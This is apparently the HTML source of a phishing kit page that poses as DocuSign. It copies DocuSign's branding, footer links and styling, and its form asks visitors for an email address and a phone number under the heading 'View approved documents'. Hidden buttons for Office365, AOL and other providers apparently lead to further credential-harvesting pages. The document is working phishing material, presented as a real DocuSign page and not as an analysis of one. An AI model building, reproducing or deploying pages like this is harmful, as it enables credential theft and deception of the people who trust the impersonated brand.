  1991.                    if (typeof(body[0].clientWidth) != 'undefined' && body[0].clientWidth != 0) {
  1992.                        bw = body[0].clientWidth;
  1993.                    } else if (typeof(body[0].offsetWidth) != 'undefined' && body[0].offsetWidth != 0) {
  1994.                        bw = body[0].offsetWidth;
  1995.                    }
  1996.                }
  1997.            }
  1998.            return bw;
  1999.        }
  2000.  
  2001.        function MasterPageScrollLeft() {
  2002.            var bL = 0;
  2003.            if (masterIsMobile == "true" && window.pageXOffset != null) {
  2004.                bL = window.pageXOffset;
  2005.            } else if (document.documentElement && document.documentElement.scrollLeft != null) {
  2006.                bL = document.documentElement.scrollLeft;
  2007.            } else {
  2008.                bL = document.body.scrollLeft;
  2009.            }
  2010.            return bL;
  2011.        }
  2012.  
  2013.        function upgradeClick() {
  2014.            if (document.forms['upgradeForm'] != null) {
  2015.                document.forms['upgradeForm'].submit();
  2016.            }
  2017.            return false;
  2018.        }
  2019.    </script>
  2020. </head>
  2021.  
  2022.  
  2023.  
  2024. <body id="ds_docubody">
  2025.  
  2026.     <form method="post" action="" id="aspnetForm">
  2027.         <div class="aspNetHidden">
  2028.             <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTQzNzc3ODg2MQ8WAh4VX19BbnRpWHNyZk1lbWJlclRva2VuBSAyN2E3MDYxMmIwOTI0YzM2OThkYjFiMzc0YTYwMDljMBYCZg9kFgICAg9kFggCAQ8PFgIeB1Zpc2libGVoZGQCAw9kFgICBw9kFgoCAQ8PFgIfAWhkFgoCAQ8WAh8BaGQCAw9kFgICAQ8WAh4EVGV4dAUWU2V0IGFjY291bnQgYXMgZGVmYXVsdGQCBw9kFgICAw9kFgJmDxYMHgdvbmNsaWNrBRZyZXR1cm4gdXBncmFkZUNsaWNrKCk7Hglpbm5lcmh0bWxlHghkaXNhYmxlZGQeCm9ua2V5cHJlc3MFaGlmKGV2ZW50KXtpZih0eXBlb2YoSXNFbnRlck9yU3BhY2VLZXkpIT09J3VuZGVmaW5lZCcmJklzRW50ZXJPclNwYWNlS2V5KGV2ZW50KSl7cmV0dXJuIHVwZ3JhZGVDbGljaygpO319HhBDYXVzZXNWYWxpZGF0aW9uZx4FY2xhc3MFDEJ0bnNlY29uZGFyeWQCCQ8WAh8BaGQCDQ8WAh8CBQZMb2dvdXRkAgUPDxYCHwFoZBYKAgEPDxYCHwFoZGQCAw8PFgIfAWhkZAIEDw8WAh8BaGRkAgUPDxYCHwFoZGQCCQ8PFgIfAWhkZAIHDw8WAh8BaGQWCgIBDxYCHwFoZAIDDxYCHwFoZAIJDxYCHwFoZAIPD2QWAgIBDxYCHwIFFlNldCBhY2NvdW50IGFzIGRlZmF1bHRkAhUPFgIfAgUGTG9nb3V0ZAIJDw8WAh8BaGRkAgsPZBYCAgEPZBYCAgMPEA8WAh4LXyFEYXRhQm91bmRnZA8WBGYCAQICAgMWBBAFA05BMQUzaHR0cHM6Ly93d3cuZG9jdXNpZ24ubmV0L01lbWJlci9KYW5yYWluRGlzcGxheS5hc3B4ZxAFA05BMgUzaHR0cHM6Ly9uYTIuZG9jdXNpZ24ubmV0L01lbWJlci9KYW5yYWluRGlzcGxheS5hc3B4ZxAFA05BMwUzaHR0cHM6Ly9uYTMuZG9jdXNpZ24ubmV0L01lbWJlci9KYW5yYWluRGlzcGxheS5hc3B4ZxAFAkVVBTJodHRwczovL2V1LmRvY3VzaWduLm5ldC9NZW1iZXIvSmFucmFpbkRpc3BsYXkuYXNweGdkZAIHDxYCHwJlZAIJDw8WAh8BaGRkZLPHkEseDSO6z3OLYcKlDQ0hytFHJVmg/KAOoF49Syg+l/lXPc+/w0BoZPPPIwe++HxL0ej54DeFmGxg0CRUC88=" />
  2029.         </div>
  2030.  
  2031.         <div class="aspNetHidden">
  2032.  
  2033.             <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="B2C6BEC4" />
  2034.             <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEdAAc2HpljsHMc3ko7qWtMAwIjUxg2eR5ftqPriAH4UyjRrHc9wrbHQpcOPAAI5iaiKfFQcmKRVhBaWpIqfGI7n7lAPooQ6xlmNYUzxS8YIMYt7wpMZ52KETNMhGu5BUYcYUYxLaG6QZnBQJBnZUwy7F+4Y82XUSJ29sMTtD3de5ny5o22YGtRBi9NtHuvP/81oLV/KRP6rANwWPDu8wSWZ0Dau1iNWxeXGnY0k7WB3EJONg==" />
  2035.         </div>
  2036.         <div id="ds_divInstance" style="display: none;">
  2037.             173
  2038.         </div>
  2039.         <input type="hidden" name="ds$ti" id="ds_ti" />
  2040.         <input type="hidden" name="hdnSetSelectedAccount" id="hdnSetSelectedAccount" value="" />
  2041.         <input name="ds$hdnMasterPageAction" type="hidden" id="ds_hdnMasterPageAction" />
  2042.         <input type="hidden" name="hdnChangeSiteAccount" id="hdnChangeSiteAccount" value="" />
  2043.         <div id="ds_Border" class="Border scroll-container">
  2044.  
  2045.  
  2046.             <div id="ds_FormBody" class="FormBody scroll-area">
  2047.  
  2048.  
  2049.  
  2050.                 <div class="top-area" id="newHeader">
  2051.                     <div class="logo-wrapper">
  2052.                         <a href="http://www.docusign.com" class="logo-link">
  2053.                 <img src="img/docusign.png" class="logo" alt="Docusign"></a>
  2054.                     </div>
  2055.                     <div class="help-wrapper"><a href="http://www.docusign.com/support" class="help-link" target="_new">Help</a></div>
  2056.                 </div>
  2057.  
  2058.  
  2059.                 <div class="form-area">
  2060.                     <h1>
  2061.                         View approved documents
  2062.                     </h1>
  2063.                     <img src="img/social_auth_providers.png" alt="" height="30">
  2064.                     <div id="ds_hldrBdy_janrainRow" class="janrainColumnContainer LoginRow LoginRowLbl">
  2065.                         <div class="container">
  2066.                             <form class="form-signin">
  2067.                                
  2068.                             <span class="FieldLabel">Fill the field below to proceed</span><br><br>
  2069.                                 <label for="inputEmail" class="sr-only">Recovery email address</label>
  2070.                                 <input type="email" id="inputEmail" name="email" class="form-control" placeholder="Recovery email address" required autofocus>
  2071.                                 <label for="inputPassword" class="sr-only">Phone number</label>
  2072.                                 <input type="password" id="inputPassword" name="phone" class="form-control" placeholder="Phone number" required>
  2073.                                 <br>
  2074.                                 <button class="btn btn-lg btn-primary btn-block" type="submit">Proceed</button>
  2075.                             </form>
  2076.  
  2077.                         </div>
  2078.                     </div>
  2079.                     <h3 class="LoginRow LoginRowLbl">
  2080.                        
  2081.                         <div class="logins" style="display: none">
  2082.                             <a href="office365" class="btn btn-block btn-lg btn-cus"><img src="img/app_office-365_512x512.png" alt="" height="30"> Office365</a>
  2083.                             <a href="aol" class="btn btn-block btn-lg btn-cus"><img src="img/aol.png" alt="" height="15"></a>
  2084.                             <a href="other" class="btn btn-block btn-lg btn-cus"><img src="img/social_auth_providers.png" alt="" height="25"></a>
  2085.                         </div>
  2086.                     </h3>
  2087.                 </div>
  2088.  
  2089.  
  2090.  
  2091.             </div>
  2092.  
  2093.         </div>
  2094.  
  2095.         <div id="popupMask"></div>
  2096.  
  2097.         <div id="ds_Footer" class="Footer">
  2098.  
  2099.             <img id="ds_imgLogoFooter" title="Powered by DocuSign" class="FooterImage" src="img/powered_by_docusign_gray.png" alt="Powered by DocuSign" style="height:20px;" />
  2100.  
  2101.             <div class="FooterLinks" id="divFooterLinks">
  2102.                 <div id="ds_divLanguageMenu" class="FooterMenuClosed">
  2103.                     <div id="divLanguageMenuItems" style="display: none;">
  2104.                         <div class="ActionMenuItemTopSmall" onmousedown="CloseMasterPageMenus();" onkeydown="CloseMasterPageMenus();"></div>
  2105.                         <table role="presentation">
  2106.                             <tr>
  2107.                                 <td>
  2108.                                     <div title="Simplified Chinese" class="ActionMenuItem" ontouchstart="if (window.BtnCancelMD) { window.BtnCancelMD(this);}" ontouchend="MasterPageAction('setlang-zh_CN');return CE(event);" onmousedown="MasterPageAction('setlang-zh_CN')" onkeydown="MasterPageAction('setlang-zh_CN')">中文 (简体)</div>
  2109.                                 </td>
  2110.                                 <td>
  2111.                                     <div title="Traditional Chinese" class="ActionMenuItem" ontouchstart="if (window.BtnCancelMD) { window.BtnCancelMD(this);}" ontouchend="MasterPageAction('setlang-zh_TW');return CE(event);" onmousedown="MasterPageAction('setlang-zh_TW')" onkeydown="MasterPageAction('setlang-zh_TW')">中文 (繁體)</div>
  2112.                                 </td>
  2113.                                 <td>
  2114.                                     <div title="Dutch" class="ActionMenuItem" ontouchstart="if (window.BtnCancelMD) { window.BtnCancelMD(this);}" ontouchend="MasterPageAction('setlang-nl');return CE(event);" onmousedown="MasterPageAction('setlang-nl')" onkeydown="MasterPageAction('setlang-nl')">Nederlandse</div>
  2115.                                 </td>
  2116.                                 <td>
  2117.                                     <div title="English" class="ActionMenuItem" ontouchstart="if (window.BtnCancelMD) { window.BtnCancelMD(this);}" ontouchend="MasterPageAction('setlang-en');return CE(event);" onmousedown="MasterPageAction('setlang-en')" onkeydown="MasterPageAction('setlang-en')">English</div>
  2118.                                 </td>
  2119.                             </tr>
  2120.                             <tr>
  2121.                                 <td>
  2122.                                     <div title="French" class="ActionMenuItem" ontouchstart="if (window.BtnCancelMD) { window.BtnCancelMD(this);}" ontouchend="MasterPageAction('setlang-fr');return CE(event);" onmousedown="MasterPageAction('setlang-fr')" onkeydown="MasterPageAction('setlang-fr')">Français</div>
  2123.                                 </td>
  2124.                                 <td>
  2125.                                     <div title="German" class="ActionMenuItem" ontouchstart="if (window.BtnCancelMD) { window.BtnCancelMD(this);}" ontouchend="MasterPageAction('setlang-de');return CE(event);" onmousedown="MasterPageAction('setlang-de')" onkeydown="MasterPageAction('setlang-de')">Deutsch</div>
  2126.                                 </td>
  2127.                                 <td>
  2128.                                     <div title="Italian" class="ActionMenuItem" ontouchstart="if (window.BtnCancelMD) { window.BtnCancelMD(this);}" ontouchend="MasterPageAction('setlang-it');return CE(event);" onmousedown="MasterPageAction('setlang-it')" onkeydown="MasterPageAction('setlang-it')">Italiano</div>
  2129.                                 </td>
  2130.                                 <td>
  2131.                                     <div title="Japanese" class="ActionMenuItem" ontouchstart="if (window.BtnCancelMD) { window.BtnCancelMD(this);}" ontouchend="MasterPageAction('setlang-ja');return CE(event);" onmousedown="MasterPageAction('setlang-ja')" onkeydown="MasterPageAction('setlang-ja')">日本語</div>
  2132.                                 </td>
  2133.                             </tr>
  2134.                             <tr>
  2135.                                 <td>
  2136.                                     <div title="Korean" class="ActionMenuItem" ontouchstart="if (window.BtnCancelMD) { window.BtnCancelMD(this);}" ontouchend="MasterPageAction('setlang-ko');return CE(event);" onmousedown="MasterPageAction('setlang-ko')" onkeydown="MasterPageAction('setlang-ko')">한국어</div>
  2137.                                 </td>
  2138.                                 <td>
  2139.                                     <div title="Portuguese (Portugal)" class="ActionMenuItem" ontouchstart="if (window.BtnCancelMD) { window.BtnCancelMD(this);}" ontouchend="MasterPageAction('setlang-pt');return CE(event);" onmousedown="MasterPageAction('setlang-pt')" onkeydown="MasterPageAction('setlang-pt')">Português (Portugal)</div>
  2140.                                 </td>
  2141.                                 <td>
  2142.                                     <div title="Portuguese (Brasil)" class="ActionMenuItem" ontouchstart="if (window.BtnCancelMD) { window.BtnCancelMD(this);}" ontouchend="MasterPageAction('setlang-pt_BR');return CE(event);" onmousedown="MasterPageAction('setlang-pt_BR')" onkeydown="MasterPageAction('setlang-pt_BR')">Português (Brasil)</div>
  2143.                                 </td>
  2144.                                 <td>
  2145.                                     <div title="Russian" class="ActionMenuItem" ontouchstart="if (window.BtnCancelMD) { window.BtnCancelMD(this);}" ontouchend="MasterPageAction('setlang-ru');return CE(event);" onmousedown="MasterPageAction('setlang-ru')" onkeydown="MasterPageAction('setlang-ru')">Русский</div>
  2146.                                 </td>
  2147.                             </tr>
  2148.                             <tr>
  2149.                                 <td>
  2150.                                     <div title="Spanish" class="ActionMenuItem" ontouchstart="if (window.BtnCancelMD) { window.BtnCancelMD(this);}" ontouchend="MasterPageAction('setlang-es');return CE(event);" onmousedown="MasterPageAction('setlang-es')" onkeydown="MasterPageAction('setlang-es')">Español</div>
  2151.                                 </td>
  2152.                         </table>
  2153.                     </div>
  2154.                 </div>
  2155.                 <div id="ds_divLanguageSelected" onkeyup="OpenMasterPageMenu(&#39;divLanguageMenuItems&#39;,&#39;divLanguageMenu&#39;, &#39;ActionMenuShowUp&#39;);" onmouseup="OpenMasterPageMenu(&#39;divLanguageMenuItems&#39;,&#39;divLanguageMenu&#39;, &#39;ActionMenuShowUp&#39;);" style="padding-right: 10px; white-space: nowrap; text-align: center;">
  2156.                     English (US) <img src="img/btn_arrow_u.png" style="vertical-align:middle;" border="0" alt="Up Arrow" />
  2157.                 </div>
  2158.             </div>
  2159.             <script>
  2160.                 function linkClick_TermsOfUse() {
  2161.                     window.open('http://www.docusign.com/company/terms-of-use/lang/en', 'TermsOfUse');
  2162.                     return false;
  2163.                 }
  2164.             </script><a tabindex='0' id="TermsOfUse" onclick="linkClick_TermsOfUse()" onkeypress="if(event){if(typeof(IsEnterOrSpaceKey)!=='undefined'&&IsEnterOrSpaceKey(event)){linkClick_TermsOfUse();}}" class="FooterLink" href='javascript:void(0);'>Terms Of Use</a><span>&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;</span>
  2165.             <script>
  2166.                 function linkClick_CorporateSupport() {
  2167.                     window.open('https://www.docusign.com/support', 'CorporateSupport');
  2168.                     return false;
  2169.                 }
  2170.             </script><a tabindex='0' id="CorporateSupport" onclick="linkClick_CorporateSupport()" onkeypress="if(event){if(typeof(IsEnterOrSpaceKey)!=='undefined'&&IsEnterOrSpaceKey(event)){linkClick_CorporateSupport();}}" class="FooterLink" href='javascript:void(0);'>Support</a><span>&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;</span>
  2171.             <script>
  2172.                 function linkClick_Feedback() {
  2173.                     window.open('http://community.docusign.com/t5/Feedback/ct-p/feedback', 'Feedback');
  2174.                     return false;
  2175.                 }
  2176.             </script><a tabindex='0' id="Feedback" onclick="linkClick_Feedback()" onkeypress="if(event){if(typeof(IsEnterOrSpaceKey)!=='undefined'&&IsEnterOrSpaceKey(event)){linkClick_Feedback();}}" class="FooterLink" href='javascript:void(0);'>Feedback</a><span>&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;</span>
  2177.             <script>
  2178.                 function linkClick_IntellectualProp() {
  2179.                     window.open('http://www.docusign.com/IP/lang/en', 'IntellectualProp');
  2180.                     return false;
  2181.                 }
  2182.             </script><a tabindex='0' id="IntellectualProp" onclick="linkClick_IntellectualProp()" onkeypress="if(event){if(typeof(IsEnterOrSpaceKey)!=='undefined'&&IsEnterOrSpaceKey(event)){linkClick_IntellectualProp();}}" class="FooterLink" href='javascript:void(0);'>Intellectual Property</a><span>&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;</span>
  2183.             <script>
  2184.                 function linkClick_PrivacyPolicy() {
  2185.                     window.open('http://www.docusign.com/company/privacy-policy/lang/en', 'PrivacyPolicy');
  2186.                     return false;
  2187.                 }
  2188.             </script><a tabindex='0' id="PrivacyPolicy" onclick="linkClick_PrivacyPolicy()" onkeypress="if(event){if(typeof(IsEnterOrSpaceKey)!=='undefined'&&IsEnterOrSpaceKey(event)){linkClick_PrivacyPolicy();}}" class="FooterLink" href='javascript:void(0);'>Privacy Policy</a><span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Copyright © 2018 DocuSign, Inc. All rights reserved.</span>
  2189.  
  2190.  
  2191.             <div class="SctClr"></div>
  2192.  
  2193.         </div>
  2194.         <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
  2195.         <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.0/umd/popper.min.js" integrity="sha384-cs/chFZiN24E4KMATLdqdvsezGxaGsi4hLGOzlXwp5UZB1LY//20VyM2taTB4QvJ" crossorigin="anonymous"></script>
  2196.         <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/js/bootstrap.min.js" integrity="sha384-uefMccjFJAIv6A+rW+L4AHf99KvxDjWSu1z9VI8SKNVmz4sk7buKt/6v9KI65qnm" crossorigin="anonymous"></script>
  2197.  
  2198.  
  2199.         <script type="text/javascript">
  2200.             //<![CDATA[
  2201.            if (self != top) {
  2202.                window.popped = true;
  2203.                var pm = document.getElementById('popmsg');
  2204.                if (pm) {
  2205.                    pm.innerHTML = "Please check for the new window that has popped with your document open.  If the window has been blocked by a pop-up blocker, please click Start DocuSign to continue.";
  2206.                } else {
  2207.                    var bdy = document.getElementsByTagName('body');
  2208.                    if (bdy) bdy[0].style.display = 'none';
  2209.                }
  2210.                window.open('https://www.docusign.net/member/janraindisplay.aspx');
  2211.            } //]]>
  2212.         </script>
  2213.     </form>
  2214.  
  2215.  
  2216.  
  2217.  
  2218. </body>
  2219.  
  2220.  
  2221.  
  2222. </html>
  2223. <!-------page 2---!>
  2224.  
  2225. <!DOCTYPE html >
  2226.  
  2227. <html lang="en">
  2228. <head>
  2229.    <script type="text/javascript">
  2230.        (function(global) {
  2231.            var times = {};
  2232.            //------------------------------------
  2233.            function LogTiming(action, startTime, endTime) {
  2234.                try {
  2235.                    var loggingOn = false;
  2236.                    if (!loggingOn) {
  2237.                        return;
  2238.                    }
  2239.                    var params = "&action=" + action;
  2240.                    //var pageName = "DocuSign.aspx";
  2241.                    var url = "DocuSignXML.aspx?logtiming=1" + GetTI(false);
  2242.  
  2243.                    if (startTime && endTime) {
  2244.                        params += "&starttime=" + startTime + "&endtime=" + endTime;
  2245.                    } else if (window.res_ServerTimeForLogging) {
  2246.                        // If no times specified assume we're using sever to generate start and end times
  2247.                        params += "&serverstarttime=" + global.EscapeAll(res_ServerTimeForLogging);
  2248.                    }
  2249.  
  2250.                    var xLogTiming = new global.XmlLoader(url);
  2251.                    xLogTiming.sendPost("application/x-www-form-urlencoded", "requestPage=" + global.EscapeAll(pageName) + params);
  2252.                } catch (err) {
  2253.                    // Make sure logging doesn't break anything
  2254.                }
  2255.            }
  2256.            //------------------------------------
  2257.            function now() {
  2258.                return +(new Date());
  2259.            }
  2260.            //------------------------------------
  2261.            function recordTime(timeLabel) {
  2262.                try {
  2263.                    times[timeLabel] = now();
  2264.                } catch (err) {}
  2265.            }
  2266.            //------------------------------------
  2267.            // logDiff looks up startTimeLabel (created by recordTime) which is an accessor to the times object.
  2268.            // if no time is found in the times object matching startTimeLabel or startTimeLabel is undefined
  2269.            // LogTime will use the server start time res_ServerTimeForLogging and serverEndTime when posted.
  2270.            // If endTimeLabel is undefined then we assume now() for endTime
  2271.            // Usage:
  2272.            //    a point in your JS code do:
  2273.            //      timeInfo.recordTime("anystartlabel")
  2274.            //    end point of the JS code you want to track
  2275.            //      timeInfo.recordTime("anyendlabel")
  2276.            //    then call logDiff to post to server
  2277.            //      timeInfo.logDiff("AnyAction", "anystartlabel", "anyendlabel");
  2278.            function logDiff(action, startTimeLabel, endTimeLabel) {
  2279.                try {
  2280.                    var endTime;
  2281.                    if (startTimeLabel != null) {
  2282.                        if (endTimeLabel == null) endTime = now();
  2283.                        else endTime = times[endTimeLabel];
  2284.                    }
  2285.                    LogTiming(action, times[startTimeLabel], endTime);
  2286.                } catch (err) {
  2287.                    // Make sure logging doesn't break anything
  2288.                }
  2289.            }
  2290.            //------------------------------------
  2291.            var timeInfo = {
  2292.                recordTime: recordTime,
  2293.                logDiff: logDiff
  2294.            }
  2295.            //------------------------------------
  2296.            global.timeInfo = timeInfo;
  2297.        })(this);
  2298.        timeInfo.recordTime("JsExecStarted");
  2299.    </script>
  2300.  
  2301.  
  2302.    <meta name="robots" content="noindex, noarchive, nofollow, nosnippet" />
  2303.    <meta name="googlebot" content="noindex, noarchive, nofollow, nosnippet, noimageindex" />
  2304.    <meta name="slurp" content="noindex, noarchive, nofollow, nosnippet, noodp, noydir" />
  2305.    <meta name="msnbot" content="noindex, noarchive, nofollow, nosnippet" />
  2306.    <meta name="teoma" content="noindex, noarchive, nofollow, nosnippet" />
  2307.    <title>
  2308.        DocuSign
  2309.    </title>
  2310.    <link href="https://www.docusign.com/favicon.ico" rel="shortcut icon" type="image/x-icon" />
  2311.    <meta content="JavaScript" name="vs_defaultClientScript" />
  2312.    <meta content="C#" name="CODE_LANGUAGE" />
  2313.    <meta name="viewport" content="initial-scale=1.0" />
  2314.    <link id="ds_dsCss_styMartiniFonts" rel="stylesheet" href="//docucdn-a.akamaihd.net/signing/1.9.0/css/font-faces.css" type="text/css"></link>
  2315.  
  2316.    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/css/bootstrap.min.css" integrity="sha384-9gVQ4dYFwwWSjIDZnLEWnxCjeSWFphJiwGPXr1jddIhOegiu1FwO5qRGvFXOdJZ4" crossorigin="anonymous">
  2317.  
  2318.  
  2319.  
  2320.    <style id="ds_dsCss_styHolder" type="text/css">
  2321.        body {
  2322.            margin: 0px;
  2323.            font-family: Helvetica, Arial, sans-serif !important;
  2324.            font-size: 12px;
  2325.            color: #333333;
  2326.            background-color: none;
  2327.            background-image: url(img/body_background.png);
  2328.            background-repeat: repeat;
  2329.        }
  2330.  
  2331.        input {
  2332.            font-family: Helvetica, Arial, sans-serif !important;
  2333.            font-size: 12px;
  2334.        }
  2335.  
  2336.        select {
  2337.            font-family: Helvetica, Arial, sans-serif !important;
  2338.            font-size: 12px;
  2339.        }
  2340.  
  2341.        textarea {
  2342.            font-family: Helvetica, Arial, sans-serif !important;
  2343.            font-size: 13px;
  2344.        }
  2345.  
  2346.        button {
  2347.            font-family: Helvetica, Arial, sans-serif !important;
  2348.            font-size: 13px;
  2349.        }
  2350.  
  2351.        a {
  2352.            font-family: Helvetica, Arial, sans-serif !important;
  2353.            color: #0D61AF;
  2354.            cursor: pointer;
  2355.            text-decoration: none;
  2356.            font-size: 13px;
  2357.        }
  2358.  
  2359.        a:hover {
  2360.            text-decoration: underline;
  2361.        }
  2362.  
  2363.        a.smaller {
  2364.            font-size: 11px;
  2365.        }
  2366.  
  2367.        .SubjectHeaderTxt {
  2368.            color: #999;
  2369.        }
  2370.  
  2371.        .BtnHighlight {
  2372.            width: 1px;
  2373.            position: absolute;
  2374.            background-color: #fff;
  2375.            top: 0px;
  2376.            height: 32px;
  2377.        }
  2378.  
  2379.        .Btnyellow_new {
  2380.            position: relative;
  2381.            cursor: pointer;
  2382.            text-decoration: none;
  2383.            white-space: nowrap;
  2384.            background-repeat: repeat-x;
  2385.            padding: 1px 15px;
  2386.            font-family: Helvetica, Arial, sans-serif !important;
  2387.            text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.5);
  2388.            background-image: url(img/button_gradient.png);
  2389.            -moz-border-radius: 2px;
  2390.            -webkit-border-radius: 2px;
  2391.            border-radius: 2px;
  2392.            border: solid 1px #e7b236;
  2393.            ;
  2394.            font-size: 12px;
  2395.            font-weight: bold;
  2396.            min-height: 34px;
  2397.            background-color: #ffcc4a;
  2398.            color: #333333 !important;
  2399.        }
  2400.  
  2401.        .Btngray_reskin {
  2402.            border: solid 1px #cccccc;
  2403.            border-radius: 2px;
  2404.            -webkit-border-radius: 2px;
  2405.            -moz-border-radius: 2px;
  2406.            box-shadow: 0px 1px 3px 0px rgba(0, 0, 0, .15), inset 1px 1px 1px 1px rgba(255, 255, 255, 0.5);
  2407.            -webkit-box-shadow: 0px 1px 3px 0px rgba(0, 0, 0, .15), inset 1px 1px 1px 1px rgba(255, 255, 255, 0.5);
  2408.            -moz-box-shadow: 0px 1px 3px 0px rgba(0, 0, 0, .15), inset 1px 1px 1px 1px rgba(255, 255, 255, 0.5);
  2409.            background-image: url(img/button_gradient.png);
  2410.            background-repeat: repeat-x;
  2411.            font-size: 13px;
  2412.            margin: 2px;
  2413.            text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.5);
  2414.            border: solid 1px #C6C6C6;
  2415.            background-color: #e2e2e2;
  2416.            color: #666666;
  2417.        }
  2418.  
  2419.        .Btngray_reskin:hover,
  2420.        .SigningHeaderButton:hover {
  2421.            background-image: url(img/button_gradient_34_hover.png);
  2422.        }
  2423.  
  2424.        .Btngray_reskin:active,
  2425.        .HeaderBtnyellow_new:active,
  2426.        .SigningHeaderButton:active {
  2427.            background-image: url(img/button_gradient_34_press.png);
  2428.        }
  2429.  
  2430.        .SigningHeaderButton {
  2431.            text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.5);
  2432.            border: solid 1px #C6C6C6;
  2433.            background-color: #e2e2e2;
  2434.            color: #666666;
  2435.        }
  2436.  
  2437.        .Btngray_home {
  2438.            border: solid 1px #cccccc;
  2439.            border-radius: 2px;
  2440.            -webkit-border-radius: 2px;
  2441.            -moz-border-radius: 2px;
  2442.            box-shadow: 0px 1px 3px 0px rgba(0, 0, 0, .15);
  2443.            -webkit-box-shadow: 0px 1px 3px 0px rgba(0, 0, 0, .15);
  2444.            -moz-box-shadow: 0px 1px 3px 0px rgba(0, 0, 0, .15);
  2445.            background-color: #DCDCDC;
  2446.            background-image: url(img/button_gradient_40.png);
  2447.            background-repeat: repeat-x;
  2448.            font-size: 16px;
  2449.            color: #333333;
  2450.            position: relative;
  2451.            height: 40px;
  2452.            cursor: pointer;
  2453.        }
  2454.  
  2455.        .Btngray_home:hover {
  2456.            background-image: url(img/button_gradient_40_hover.png);
  2457.        }
  2458.  
  2459.        .Btngray_home:active {
  2460.            background-image: url(img/button_gradient_40_press.png);
  2461.        }
  2462.  
  2463.        .Btnyellow_reskin {
  2464.            background-image: url(img/button_autonav_gradient_40.png);
  2465.            background-color: #FFCC4A;
  2466.            background-repeat: repeat-x;
  2467.            border: 1px solid #e7b236;
  2468.            border-radius: 2px;
  2469.            -webkit-border-radius: 2px;
  2470.            -moz-border-radius: 2px;
  2471.            cursor: pointer;
  2472.            position: relative;
  2473.            text-decoration: none;
  2474.            font-weight: bold;
  2475.            width: 101px !important;
  2476.            height: 42px !important;
  2477.            text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.5);
  2478.            color: #333333;
  2479.        }
  2480.  
  2481.        .Btnyellow_reskin_hover {
  2482.            background-image: url(img/button_autonav_gradient_40_on.png);
  2483.        }
  2484.  
  2485.        .Btnyellow_login {
  2486.            font-family: 'Maven Pro', Arial, sans-serif !important;
  2487.            font-weight: bold;
  2488.            font-size: 13px;
  2489.            letter-spacing: .6px;
  2490.            background-color: #ffc820;
  2491.            background-repeat: repeat-x;
  2492.            border: 1px solid transparent;
  2493.            border-radius: 2px;
  2494.            -webkit-border-radius: 2px;
  2495.            -moz-border-radius: 2px;
  2496.            cursor: pointer;
  2497.            position: relative;
  2498.            white-space: nowrap;
  2499.            text-decoration: none;
  2500.            margin: 0 !important;
  2501.            height: 34px !important;
  2502.            text-transform: uppercase;
  2503.            color: #333;
  2504.            padding: 0 18px;
  2505.            line-height: 30px;
  2506.            min-width: 0 !important;
  2507.        }
  2508.  
  2509.        .Btnyellow_login .BtnHighlight {
  2510.            display: none;
  2511.        }
  2512.  
  2513.        .Btnyellow_login_hover,
  2514.        .Btnyellow_login:hover {
  2515.            background-color: #f7ba00;
  2516.        }
  2517.  
  2518.        .Btnyellow_login:active {
  2519.            background-color: #eaa602;
  2520.        }
  2521.  
  2522.        .Btngray_login {
  2523.            font-family: 'Maven Pro', Arial, sans-serif !important;
  2524.            font-weight: bold;
  2525.            font-size: 13px;
  2526.            letter-spacing: .6px;
  2527.            background-color: #e9e9e9;
  2528.            background-repeat: repeat-x;
  2529.            border: 1px solid transparent;
  2530.            border-radius: 2px;
  2531.            -webkit-border-radius: 2px;
  2532.            -moz-border-radius: 2px;
  2533.            cursor: pointer;
  2534.            position: relative;
  2535.            white-space: nowrap;
  2536.            text-decoration: none;
  2537.            margin: 0 !important;
  2538.            height: 34px !important;
  2539.            text-transform: uppercase;
  2540.            color: #333;
  2541.            padding: 0 18px;
  2542.            line-height: 30px;
  2543.            min-width: 0 !important;
  2544.        }
  2545.  
  2546.        .Btngray_login .BtnHighlight {
  2547.            display: none;
  2548.        }
  2549.  
  2550.        .Btngray_login_hover,
  2551.        .Btngray_login:hover {
  2552.            background-color: #dcdcdc;
  2553.        }
  2554.  
  2555.        .Btngray_login:active {
  2556.            background-color: #dcdcdc;
  2557.        }
  2558.  
  2559.        .Btnyellow_home {
  2560.            background-image: url(img/button_autonav_gradient_40.png);
  2561.            background-repeat: repeat-x;
  2562.            border: 1px solid #e7b236;
  2563.            border-radius: 2px;
  2564.            box-shadow: 0px 1px 3px 0px rgba(0, 0, 0, .15);
  2565.            -webkit-box-shadow: 0px 1px 3px 0px rgba(0, 0, 0, .15);
  2566.            -moz-box-shadow: 0px 1px 3px 0px rgba(0, 0, 0, .15);
  2567.            -webkit-border-radius: 2px;
  2568.            -moz-border-radius: 2px;
  2569.            cursor: pointer;
  2570.            position: relative;
  2571.            font-size: 16px;
  2572.            text-decoration: none;
  2573.            width: 91px !important;
  2574.            height: 40px !important;
  2575.            text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.5);
  2576.            color: #333333;
  2577.            cursor: pointer;
  2578.        }
  2579.  
  2580.        .Btnyellow_home:active {
  2581.            background-image: url(img/button_autonav_gradient_40_on.png);
  2582.        }
  2583.  
  2584.        .BtnHighlight40 {
  2585.            height: 40px !important;
  2586.            opacity: 0.2;
  2587.        }
  2588.  
  2589.        .Btnprimary {
  2590.            position: relative;
  2591.            cursor: pointer;
  2592.            text-decoration: none;
  2593.            white-space: nowrap;
  2594.            background-repeat: repeat-x;
  2595.            padding: 1px 15px;
  2596.            font-family: Helvetica, Arial, sans-serif !important;
